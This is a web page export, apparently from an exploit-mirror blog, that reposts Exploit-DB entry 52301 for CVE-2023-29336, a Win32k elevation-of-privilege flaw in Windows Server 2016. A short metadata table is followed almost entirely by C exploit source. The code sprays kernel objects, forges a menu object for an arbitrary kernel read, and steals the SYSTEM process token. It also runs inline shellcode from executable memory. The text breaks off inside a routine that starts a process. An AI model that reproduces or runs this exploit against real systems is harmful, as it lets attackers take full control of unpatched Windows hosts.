{"id":5958,"date":"2025-05-25T09:34:40","date_gmt":"2025-05-25T09:34:40","guid":{"rendered":"http:\/\/localhost\/?p=5958"},"modified":"2025-05-25T09:34:40","modified_gmt":"2025-05-25T09:34:40","slug":"microsoft-windows-server-2016-win32k-elevation-of-privilege","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=5958","title":{"rendered":"Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52301<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-25T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-25T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">7.8<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ff4444; font-weight: bold;\">HIGH<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2023-29336<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege Date: 2025-05-19 Exploit Author: Milad&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: Microsoft Windows Server 2016 &#8211; Win32k Elevation of<br \/>\n<br \/>Privilege<br \/>\n<br \/># Date: 2025-05-19<br \/>\n<br \/># Exploit Author: Milad Karimi (Ex3ptionaL)<br \/>\n<br \/># Contact: miladgrayhat@gmail.com<br \/>\n<br \/># Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL<br \/>\n<br \/># Country: United Kingdom<br \/>\n<br \/># CVE : CVE-2023-29336<\/p>\n<p>#include <windows.h><br \/>\n<br \/>#include <stdio.h><br \/>\n<br \/>#include <tchar.h><\/p>\n<p>#define IDM_MYMENU 101<br \/>\n<br \/>#define IDM_EXIT 102<br \/>\n<br \/>#define IDM_DISABLE 0xf120<br \/>\n<br \/>#define IDM_ENABLE 104<br \/>\n<br \/>#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440<br \/>\n<br \/>#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448<br \/>\n<br \/>#define EPROCESS_TOKEN_OFFSET 0x4b8<\/p>\n<p>typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT<br \/>\n<br \/>uIDEnableItem, UINT uEnable);<\/p>\n<p>typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2,<br \/>\n<br \/>unsigned __int64 a3, unsigned int a4);<br \/>\n<br \/>typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2);<br \/>\n<br \/>typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID,<br \/>\n<br \/>int nConsoleInformationLength);<\/p>\n<p>NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL;<br \/>\n<br \/>NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL;<br \/>\n<br \/>NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL;<br \/>\n<br \/>fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr;<br \/>\n<br \/>LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM<br \/>\n<br \/>lParam);<br \/>\n<br \/>int syytem();<br \/>\n<br \/>typedef struct _SHELLCODE {<br \/>\n<br \/>    DWORD reserved;<br \/>\n<br \/>    DWORD pid;<br \/>\n<br \/>    DWORD off_THREADINFO_ppi;<br \/>\n<br \/>    DWORD off_EPROCESS_ActiveLink;<br \/>\n<br \/>    DWORD off_EPROCESS_Token;<br \/>\n<br \/>    BOOL bExploited;<br \/>\n<br \/>    BYTE pfnWindProc[];<br \/>\n<br \/>} SHELLCODE, * PSHELLCODE;<br \/>\n<br \/>struct tagMENU<br \/>\n<br \/>{<br \/>\n<br \/>    ULONG64 field_0;<br \/>\n<br \/>    ULONG64 field_8;<br \/>\n<br \/>    ULONG64 field_10;<br \/>\n<br \/>    ULONG64 field_18;<br \/>\n<br \/>    ULONG64 field_20;<br \/>\n<br \/>    PVOID obj28;<br \/>\n<br \/>    DWORD field_30;<br \/>\n<br \/>    DWORD flag1;<br \/>\n<br \/>    DWORD flag2;<br \/>\n<br \/>    DWORD cxMenu;<br \/>\n<br \/>    DWORD cyMenu;<br \/>\n<br \/>    ULONG64 field_48;<br \/>\n<br \/>    PVOID rgItems;<br \/>\n<br \/>    ULONG64 field_58; \/\/ + 0x58<br \/>\n<br \/>    ULONG64 field_60;<br \/>\n<br \/>    ULONG64 field_68;<br \/>\n<br \/>    ULONG64 field_70;<br \/>\n<br \/>    ULONG64 field_78;<br \/>\n<br \/>    ULONG64 field_80;<br \/>\n<br \/>    ULONG64 field_88;<br \/>\n<br \/>    ULONG64 field_90;<br \/>\n<br \/>    PVOID ref; \/\/ + 0x98<br \/>\n<br \/>};<br \/>\n<br \/>struct MyData<br \/>\n<br \/>{<br \/>\n<br \/>    BYTE name[0x96];<br \/>\n<br \/>};<br \/>\n<br \/>tagMENU* g_pFakeMenu = 0;<br \/>\n<br \/>static PSHELLCODE pvShellCode = NULL;<br \/>\n<br \/>HMENU hSystemMenu;<br \/>\n<br \/>HMENU hMenu;<br \/>\n<br \/>HMENU hSubMenu;<br \/>\n<br \/>HMENU hAddedSubMenu;<br \/>\n<br \/>HMENU hMenuB;<br \/>\n<br \/>PVOID MENU_add = 0;<br \/>\n<br \/>DWORD flag = 0;<br \/>\n<br \/>UINT iWindowCount = 0x100;<br \/>\n<br \/>HWND HWND_list[0x300];<br \/>\n<br \/>HWND HWND_list1[0x20];<br \/>\n<br \/>HMENU HMENUL_list[0x300];<br \/>\n<br \/>int Hwnd_num = 0;<br \/>\n<br \/>int Hwnd_num1 = 0;<br \/>\n<br \/>ULONGLONG HWND_add = 0;<br \/>\n<br \/>ULONGLONG GS_off = 0;<br \/>\n<br \/>WORD max = 0;<\/p>\n<p>static PULONGLONG ptagWNDFake = NULL;<br \/>\n<br \/>static PULONGLONG ptagWNDFake1 = NULL;<br \/>\n<br \/>static PULONGLONG ptagWNDFake2 = NULL;<\/p>\n<p>static PULONGLONG GS_hanlde = NULL;<\/p>\n<p>static PULONGLONG HWND_class = NULL;<\/p>\n<p>struct ThreadParams {<br \/>\n<br \/>    int threadId;<br \/>\n<br \/>    int numLoops;<br \/>\n<br \/>};<\/p>\n<p>static unsigned long long GetGsValue(unsigned long long gsValue)<br \/>\n<br \/>{<br \/>\n<br \/>    return gsValue;<br \/>\n<br \/>}<br \/>\n<br \/>PVOID<br \/>\n<br \/>GetMenuHandle(HMENU menu_D)<br \/>\n<br \/>{<br \/>\n<br \/>    int conut = 0;<br \/>\n<br \/>    PVOID HANDLE = 0;<br \/>\n<br \/>    PBYTE add = 0;<br \/>\n<br \/>    WORD temp = 0;<br \/>\n<br \/>    DWORD offset = 0xbd688;<br \/>\n<br \/>    HMODULE hModule = LoadLibraryA(&#8220;USER32.DLL&#8221;);<\/p>\n<p>    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, &#8220;IsMenu&#8221;);<br \/>\n<br \/>    ULONGLONG par1 = 0;<br \/>\n<br \/>    DWORD par2 = 0;<br \/>\n<br \/>    memcpy((VOID*)&#038;par1, (char*)((ULONGLONG)hModule + offset), 0x08);<br \/>\n<br \/>    memcpy((VOID*)&#038;par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);<\/p>\n<p>    add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);<\/p>\n<p>    if (add)<br \/>\n<br \/>    {<br \/>\n<br \/>        HANDLE = *(PVOID*)add;<br \/>\n<br \/>    }<br \/>\n<br \/>    else<br \/>\n<br \/>    {<br \/>\n<br \/>        HANDLE = 0;<br \/>\n<br \/>    }<br \/>\n<br \/>    HANDLE= (PVOID*)((ULONGLONG)HANDLE &#8211; GS_off+0x20);<br \/>\n<br \/>    return *(PVOID*)HANDLE;<\/p>\n<p>}<\/p>\n<p>PVOID<br \/>\n<br \/>xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde)<br \/>\n<br \/>{<br \/>\n<br \/>    int conut = 0;<br \/>\n<br \/>    PVOID HANDLE = 0;<br \/>\n<br \/>    PBYTE add = 0;<br \/>\n<br \/>    WORD temp = 0;<br \/>\n<br \/>    DWORD offset = 0xbd688;<br \/>\n<br \/>    HMODULE hModule = LoadLibraryA(&#8220;USER32.DLL&#8221;);<\/p>\n<p>    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, &#8220;IsMenu&#8221;);<br \/>\n<br \/>    ULONGLONG par1 = 0;<br \/>\n<br \/>    DWORD par2 = 0;<br \/>\n<br \/>    memcpy((VOID*)&#038;par1, (char*)((ULONGLONG)hModule + offset), 0x08);<br \/>\n<br \/>    memcpy((VOID*)&#038;par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);<\/p>\n<p>    temp = (ULONGLONG)menu_D >> 16;<br \/>\n<br \/>    add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);<br \/>\n<br \/>    if (add)<br \/>\n<br \/>    {<br \/>\n<br \/>        HANDLE = *(PVOID*)add;<br \/>\n<br \/>    }<br \/>\n<br \/>    else<br \/>\n<br \/>    {<br \/>\n<br \/>        HANDLE = 0;<br \/>\n<br \/>    }<br \/>\n<br \/>    HANDLE = (PVOID*)((ULONGLONG)HANDLE &#8211; GS_off + 0x20);<br \/>\n<br \/>    return *(PVOID*)HANDLE;<\/p>\n<p>}<\/p>\n<p>static<br \/>\n<br \/>VOID<br \/>\n<br \/>xxReallocPopupMenu(VOID)<br \/>\n<br \/>{<br \/>\n<br \/>    for (INT i = 0; i < 0x8; i++)\n<br \/>    {<br \/>\n<br \/>        WNDCLASSEXW Class = { 0 };<br \/>\n<br \/>        WCHAR szTemp[0x100] = { 0 };<br \/>\n<br \/>        HWND hwnd = NULL;<br \/>\n<br \/>        wsprintfW(szTemp,<br \/>\n<br \/>L&#8221;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d&#8221;,<br \/>\n<br \/>i);<br \/>\n<br \/>        Class.cbSize = sizeof(WNDCLASSEXA);<br \/>\n<br \/>        Class.lpfnWndProc = DefWindowProcW;<br \/>\n<br \/>        Class.cbWndExtra = 0;<br \/>\n<br \/>        Class.hInstance = GetModuleHandleA(NULL);<br \/>\n<br \/>        Class.lpszMenuName = NULL;<br \/>\n<br \/>        Class.lpszClassName = szTemp;<br \/>\n<br \/>        if (!RegisterClassExW(&#038;Class))<br \/>\n<br \/>        {<br \/>\n<br \/>            continue;<br \/>\n<br \/>        }<br \/>\n<br \/>    }<\/p>\n<p>}<br \/>\n<br \/>VOID<br \/>\n<br \/>createclass(VOID)<br \/>\n<br \/>{<br \/>\n<br \/>    WCHAR szTemp[0x100] = { 0 };<br \/>\n<br \/>    for (INT i = 9; i < 29; i++)\n<br \/>    {<br \/>\n<br \/>        WNDCLASSEXW Class = { 0 };<\/p>\n<p>        HWND hwnd = NULL;<br \/>\n<br \/>        wsprintfW(szTemp, L&#8221;A@A%d&#8221;, i);<br \/>\n<br \/>        Class.cbSize = sizeof(WNDCLASSEXA);<br \/>\n<br \/>        Class.lpfnWndProc = DefWindowProcW;<br \/>\n<br \/>        Class.cbWndExtra = 0x20;<br \/>\n<br \/>        Class.hInstance = GetModuleHandleA(NULL);<br \/>\n<br \/>        Class.lpszMenuName = NULL;<br \/>\n<br \/>        Class.lpszClassName = szTemp;<br \/>\n<br \/>        Class.cbClsExtra = 0x1a0;<br \/>\n<br \/>        if (!RegisterClassExW(&#038;Class))<br \/>\n<br \/>        {<br \/>\n<br \/>            continue;<br \/>\n<br \/>        }<br \/>\n<br \/>    }<\/p>\n<p>    for (INT i = 9; i < 29; i++)\n<br \/>    {<br \/>\n<br \/>        wsprintfW(szTemp, L&#8221;A@A%d&#8221;, i);<br \/>\n<br \/>        HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0,<br \/>\n<br \/>0, 0, NULL,NULL, NULL, NULL);<\/p>\n<p>    }<\/p>\n<p>}<\/p>\n<p>ULONG64 Read64(ULONG64 address)<br \/>\n<br \/>{<br \/>\n<br \/>    MENUBARINFO mbi = { 0 };<br \/>\n<br \/>    mbi.cbSize = sizeof(MENUBARINFO);<\/p>\n<p>    g_pFakeMenu->rgItems = PVOID(address &#8211; 0x48);<br \/>\n<br \/>    GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &#038;mbi);<\/p>\n<p>    return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32);\n<br \/>}<br \/>\n<br \/>void exploit()<br \/>\n<br \/>{<br \/>\n<br \/>    for (int i = 0; i < 0x20; i++)\n<br \/>    {<\/p>\n<p>        ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270,<br \/>\n<br \/>(LONG_PTR)g_pFakeMenu);<br \/>\n<br \/>        if (pmenu != 0)<br \/>\n<br \/>        {<br \/>\n<br \/>            Hwnd_num = i;<br \/>\n<br \/>            MENUBARINFO mbi = { 0 };<br \/>\n<br \/>            mbi.cbSize = sizeof(MENUBARINFO);<\/p>\n<p>        }<br \/>\n<br \/>    }<\/p>\n<p>    \/\/ Token stealing<br \/>\n<br \/>    ULONG64 p = Read64(HWND_add +0x250+ 0x10); \/\/ USER_THREADINFO<br \/>\n<br \/>    p = Read64(p); \/\/THREADINFO<br \/>\n<br \/>    p = Read64(p + 0x220); \/\/ (PROCESSINFO)<\/p>\n<p>    ULONG64 eprocess = p;<br \/>\n<br \/>    printf(&#8220;Current EPROCESS = %llx\\n&#8221;, eprocess);<br \/>\n<br \/>    p = Read64(p + 0x2f0);<\/p>\n<p>    do {<\/p>\n<p>        p = Read64(p + 0x08);<br \/>\n<br \/>        ULONG64 pid = Read64(p &#8211; 0x08);<br \/>\n<br \/>        if (pid == 4) {<\/p>\n<p>            ULONG64 pSystemToken = Read64(p + 0x68);<br \/>\n<br \/>            printf(&#8220;pSys\/tem Token = %llx \\n&#8221;, pSystemToken);<\/p>\n<p>            HWND_class = (PULONGLONG)((PBYTE)0x303000);<br \/>\n<br \/>            HWND_class[8] = eprocess + 0x290;<br \/>\n<br \/>            HWND_class[12] = 0x100;<br \/>\n<br \/>            HWND_class[20] = 0x303010;<\/p>\n<p>            ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 +<br \/>\n<br \/>0x98 &#8211; 0xa0, (LONG_PTR)HWND_class);<br \/>\n<br \/>            SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken);<br \/>\n<br \/>            ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 &#8211;<br \/>\n<br \/>0xa0, (LONG_PTR)ret_add);<\/p>\n<p>            break;<br \/>\n<br \/>        }<br \/>\n<br \/>    } while (p != eprocess);<br \/>\n<br \/>    syytem();<br \/>\n<br \/>}<\/p>\n<p>void buildmem()<br \/>\n<br \/>{<\/p>\n<p>    WORD max_handle = 0;<br \/>\n<br \/>    pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000,<br \/>\n<br \/>MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br \/>\n<br \/>    if (pvShellCode == NULL)<br \/>\n<br \/>    {<br \/>\n<br \/>        return;<br \/>\n<br \/>    }<br \/>\n<br \/>    ZeroMemory(pvShellCode, 0x10000);<\/p>\n<p>    ptagWNDFake = (PULONGLONG)((PBYTE)0x304140);<br \/>\n<br \/>    ptagWNDFake[0] = (ULONGLONG)0x304140;<\/p>\n<p>    ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10;<\/p>\n<p>    ptagWNDFake[6] = (ULONGLONG)0x304140;<br \/>\n<br \/>    ptagWNDFake[8] = 0x305300;<\/p>\n<p>    ptagWNDFake[11] = (ULONGLONG)MENU_add;<br \/>\n<br \/>    ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230;<br \/>\n<br \/>    ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28;<br \/>\n<br \/>    ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30;<br \/>\n<br \/>    ptagWNDFake[71] = (ULONGLONG)0x000004;<\/p>\n<p>    ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300);<br \/>\n<br \/>    ptagWNDFake1[1] = (ULONGLONG)0x11;<br \/>\n<br \/>    ptagWNDFake1[2] = (ULONGLONG)0x305320;<br \/>\n<br \/>    ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000;<br \/>\n<br \/>    ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000;<br \/>\n<br \/>    ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 &#8211; 0x120;<\/p>\n<p>    ptagWNDFake1[14] = (ULONGLONG)0x306500;<br \/>\n<br \/>    ptagWNDFake1[16] = (ULONGLONG)305400;<\/p>\n<p>    ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500);<br \/>\n<br \/>    ptagWNDFake1[11] = (ULONGLONG)0x306600;<\/p>\n<p>    WNDCLASSEX WndClass = { 0 };<br \/>\n<br \/>    WndClass.cbSize = sizeof(WNDCLASSEX);<br \/>\n<br \/>    WndClass.lpfnWndProc = DefWindowProc;<br \/>\n<br \/>    WndClass.style = CS_VREDRAW | CS_HREDRAW;<br \/>\n<br \/>    WndClass.cbWndExtra = 0xe0;<br \/>\n<br \/>    WndClass.hInstance = NULL;<br \/>\n<br \/>    WndClass.lpszMenuName = NULL;<br \/>\n<br \/>    WndClass.lpszClassName = L&#8221;NormalClass&#8221;;<\/p>\n<p>    RegisterClassEx(&#038;WndClass);<\/p>\n<p>    for (int i = 0; i < 0x200; i++)\n<br \/>    {<br \/>\n<br \/>        HMENUL_list[i] = CreateMenu();<br \/>\n<br \/>    }<br \/>\n<br \/>    for (int i = 0; i < 0x100; i++)\n<br \/>    {<br \/>\n<br \/>        HWND_list[i] = CreateWindowEx(NULL, L&#8221;NormalClass&#8221;, NULL,<br \/>\n<br \/>WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL);<\/p>\n<p>    }<br \/>\n<br \/>    for (int i = 0; i < 0x100; i++)\n<br \/>    {<\/p>\n<p>        SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000);<\/p>\n<p>        SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000);<\/p>\n<p>    }<\/p>\n<p>    for (int i = 0x20; i < 0x60; i++)\n<br \/>    {<br \/>\n<br \/>        if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2],<br \/>\n<br \/>0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 &#8211; 1],<br \/>\n<br \/>0x01)== 0x250)<br \/>\n<br \/>        {<br \/>\n<br \/>            if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 +<br \/>\n<br \/>1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)<br \/>\n<br \/>== 0x250)<br \/>\n<br \/>            {<br \/>\n<br \/>                HWND_add =<br \/>\n<br \/>(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01);<br \/>\n<br \/>                max = i * 2;<br \/>\n<br \/>                break;<br \/>\n<br \/>            }<br \/>\n<br \/>        }<br \/>\n<br \/>        if (i == 0x5f)<br \/>\n<br \/>        {<br \/>\n<br \/>            HWND_add = 0;<br \/>\n<br \/>        }<\/p>\n<p>    }<\/p>\n<p>    ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 &#8211; 0x120;<\/p>\n<p>    DestroyWindow(HWND_list[max]);<\/p>\n<p>    createclass();<\/p>\n<p>    \/\/ Create a fake spmenu<br \/>\n<br \/>    PVOID hHeap = (PVOID)0x302000;<\/p>\n<p>    g_pFakeMenu = (tagMENU*)(PVOID)0x302000;<br \/>\n<br \/>    g_pFakeMenu->ref = (PVOID)0x302300;<br \/>\n<br \/>    *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu;<br \/>\n<br \/>    \/\/ cItems = 1<br \/>\n<br \/>    g_pFakeMenu->obj28 = (PVOID)0x302200;<br \/>\n<br \/>    *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1;<br \/>\n<br \/>    \/\/ rgItems<br \/>\n<br \/>    g_pFakeMenu->rgItems = (PVOID)0x304000;<br \/>\n<br \/>    \/\/ cx \/ cy must > 0<br \/>\n<br \/>    g_pFakeMenu->flag1 = 1;<br \/>\n<br \/>    g_pFakeMenu->flag2 = 1;<br \/>\n<br \/>    g_pFakeMenu->cxMenu = 1;<br \/>\n<br \/>    g_pFakeMenu->cyMenu = 1;<\/p>\n<p>    \/\/<\/p>\n<p>}<br \/>\n<br \/>int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR<br \/>\n<br \/>lpCmdLine, int nCmdShow)<br \/>\n<br \/>{<br \/>\n<br \/>    ULONGLONG gsValue = 0;<br \/>\n<br \/>    unsigned char shellcode[] =<br \/>\n<br \/>&#8220;\\x65\\x48\\x8B\\x04\\x25\\x30\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xc3&#8221;;<\/p>\n<p>    LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode),<br \/>\n<br \/>MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br \/>\n<br \/>    if (executableMemory == NULL) {<br \/>\n<br \/>        return 1;<br \/>\n<br \/>    }<br \/>\n<br \/>    memcpy(executableMemory, shellcode, sizeof(shellcode));<\/p>\n<p>    gsValue = ((ULONGLONG(*)())executableMemory)();<br \/>\n<br \/>    gsValue = gsValue + 0x800;<br \/>\n<br \/>    GS_hanlde = (PULONGLONG)(PBYTE)gsValue;<br \/>\n<br \/>    GS_off = GS_hanlde[5];<\/p>\n<p>    char str[0xb8] = &#8220;&#8221;;<br \/>\n<br \/>    memset(str, 0x41, 0xa8);<br \/>\n<br \/>    g_NtUserEnableMenuItem =<br \/>\n<br \/>(NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA(&#8220;win32u.dll&#8221;),<br \/>\n<br \/>&#8220;NtUserEnableMenuItem&#8221;);<br \/>\n<br \/>    g_NtUserSetClassLongPtr =<br \/>\n<br \/>(NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA(&#8220;win32u.dll&#8221;),<br \/>\n<br \/>&#8220;NtUserSetClassLongPtr&#8221;);<br \/>\n<br \/>    g_NtUserCreateAcceleratorTable =<br \/>\n<br \/>(NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA(&#8220;win32u.dll&#8221;),<br \/>\n<br \/>&#8220;NtUserCreateAcceleratorTable&#8221;);<br \/>\n<br \/>    g_pfnNtUserConsoleControl =<br \/>\n<br \/>(fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA(&#8220;win32u.dll&#8221;),<br \/>\n<br \/>&#8220;NtUserConsoleControl&#8221;);<\/p>\n<p>    WNDCLASS wc = { 0 };<\/p>\n<p>    wc.lpfnWndProc = WndProc;<br \/>\n<br \/>    wc.hInstance = hInstance;<br \/>\n<br \/>    wc.lpszClassName = TEXT(&#8220;EnableMenuItem&#8221;);<\/p>\n<p>    RegisterClass(&#038;wc);<\/p>\n<p>    HWND hWnd = CreateWindow(<br \/>\n<br \/>        wc.lpszClassName,<br \/>\n<br \/>        TEXT(&#8220;EnableMenuItem&#8221;),<br \/>\n<br \/>        WS_OVERLAPPEDWINDOW,<br \/>\n<br \/>        CW_USEDEFAULT,<br \/>\n<br \/>        CW_USEDEFAULT,<br \/>\n<br \/>        400, 300,<br \/>\n<br \/>        NULL,<br \/>\n<br \/>        NULL,<br \/>\n<br \/>        hInstance,<br \/>\n<br \/>        NULL<br \/>\n<br \/>    );<\/p>\n<p>    if (!hWnd) return FALSE;<\/p>\n<p>    \/\/\/<\/p>\n<p>    hSystemMenu = GetSystemMenu(hWnd, FALSE);<\/p>\n<p>    hSubMenu = CreatePopupMenu();<br \/>\n<br \/>    MENU_add = GetMenuHandle(hSubMenu);<br \/>\n<br \/>    hMenuB = CreateMenu();<\/p>\n<p>    buildmem();<br \/>\n<br \/>    if (HWND_add == 0)<br \/>\n<br \/>    {<br \/>\n<br \/>        return 0;<br \/>\n<br \/>    }<\/p>\n<p>    AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT(&#8220;0&#8221;));<br \/>\n<br \/>    AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT(&#8220;1&#8221;));<\/p>\n<p>    DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND);<\/p>\n<p>    AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L&#8221;Menu A&#8221;);<\/p>\n<p>    AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L&#8221;Menu B&#8221;);<\/p>\n<p>    ShowWindow(hWnd, nCmdShow);<br \/>\n<br \/>    UpdateWindow(hWnd);<\/p>\n<p>    flag = 1;<br \/>\n<br \/>    g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01);<\/p>\n<p>    exploit();<\/p>\n<p>    MSG msg = { 0 };<\/p>\n<p>    while (GetMessage(&#038;msg, NULL, 0, 0))<br \/>\n<br \/>    {<br \/>\n<br \/>        TranslateMessage(&#038;msg);<br \/>\n<br \/>        DispatchMessage(&#038;msg);<br \/>\n<br \/>    }<\/p>\n<p>    return (int)msg.wParam;<br \/>\n<br \/>}<\/p>\n<p>LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM<br \/>\n<br \/>lParam)<br \/>\n<br \/>{<br \/>\n<br \/>    switch (message)<br \/>\n<br \/>    {<br \/>\n<br \/>    case WM_DESTROY:<br \/>\n<br \/>        PostQuitMessage(0);<br \/>\n<br \/>        return 0;<br \/>\n<br \/>    case 0xae:<br \/>\n<br \/>        switch (wParam)<br \/>\n<br \/>        {<br \/>\n<br \/>        case 0x1000:<br \/>\n<br \/>            if (flag)<br \/>\n<br \/>            {<br \/>\n<br \/>                int itemCount = GetMenuItemCount(hMenuB);<\/p>\n<p>                for (int i = itemCount &#8211; 1; i >= 0; i&#8211;) {<br \/>\n<br \/>                    RemoveMenu(hMenuB, i, MF_BYPOSITION);<br \/>\n<br \/>                }<br \/>\n<br \/>                DestroyMenu(hSubMenu);<br \/>\n<br \/>                xxReallocPopupMenu();<br \/>\n<br \/>            }<br \/>\n<br \/>        case 0x1001:<br \/>\n<br \/>            if (flag)<br \/>\n<br \/>            {<br \/>\n<br \/>                int itemCount = GetMenuItemCount(hMenuB);<\/p>\n<p>                for (int i = itemCount &#8211; 1; i >= 0; i&#8211;) {<br \/>\n<br \/>                    RemoveMenu(hMenuB, i, MF_BYPOSITION);<br \/>\n<br \/>                }<br \/>\n<br \/>                DestroyMenu(hSubMenu);<br \/>\n<br \/>                xxReallocPopupMenu();<br \/>\n<br \/>            }<\/p>\n<p>            return 0;<br \/>\n<br \/>        }<br \/>\n<br \/>        break;<\/p>\n<p>    }<\/p>\n<p>    return DefWindowProc(hWnd, message, wParam, lParam);<br \/>\n<br \/>}<br \/>\n<br \/>int syytem()<br \/>\n<br \/>{<br \/>\n<br \/>    SECURITY_ATTRIBUTES sa;<br \/>\n<br \/>    HANDLE hRead, hWrite;<br \/>\n<br \/>    byte buf[40960] = { 0 };<br \/>\n<br \/>    STARTUPINFOW si;<br \/>\n<br \/>    